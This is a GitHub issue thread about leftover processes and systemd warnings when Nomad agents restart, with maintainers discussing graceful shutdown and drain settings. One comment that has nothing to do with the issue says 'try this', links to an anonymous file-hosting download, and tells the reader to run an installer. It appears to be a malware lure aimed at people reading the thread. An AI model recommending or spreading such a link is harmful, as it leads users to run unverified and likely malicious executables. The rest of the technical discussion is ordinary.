### ISSUE TITLE
Nomad Agent Restart Processes

### ISSUE THREAD

**Issue by mpass99** [openHPI/poseidon#677]
Related to #612.

When restarting a Nomad Agents, we find many systemd warnings.

- `nomad.service: Unit process 3620 (nomad) remains running after unit stopped.`
- `nomad.service: Found left-over process 3620 (nomad) in control group while starting unit. Ignoring.`
- `nomad.service: This usually indicates unclean termination of a previous run, or service implementation deficiencies.`

1. Create minimal reproduction steps
2. Investigate Nomads Graceful Shutdown behavior and if the systemd restart waits for it
3. Create an upstream issue if appropriate

**Comment by wandson88** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by MrSerth** [comment]
Since we have `leave_on_interrupt`, `leave_on_terminate`, and `drain_on_shutdown` configured, I would expect an actual shutdown of all Nomad-related processes (that's how I understood the issue description). However, that's not case, is it?

**Comment by mpass99** [comment]
> I would expect an actual shutdown of all Nomad-related processes (that's how I understood the issue description

I agree. That is also what [the docs](https://developer.hashicorp.com/nomad/docs/configuration#leave_on_interrupt) state.

> If this value is set to true on a client agent and the client is configured with [drain_on_shutdown](https://developer.hashicorp.com/nomad/docs/configuration/client#drain_on_shutdown), the client will drain its workloads before shutting down.

However, that's not the case. A restart of Nomad on an Agent takes about 6 seconds. Some subprocesses keep running after Nomad stopped and the draining is handled after Nomad started again.

`Systemctl` seems to be not the cause for this as it would wait up to 90 seconds by default [[1]](https://unix.stackexchange.com/questions/255438/making-systemctl-to-shutdown-process-gracefully). `TimeoutStopSec` is not overwritten in Nomad's service definition.

Maybe this question will resolve in the context of hashicorp/nomad#23937.
